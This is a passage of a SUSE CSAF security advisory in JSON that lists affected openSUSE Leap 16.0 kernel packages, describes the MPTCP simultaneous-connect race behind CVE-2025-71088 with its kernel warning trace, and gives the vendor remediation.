"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
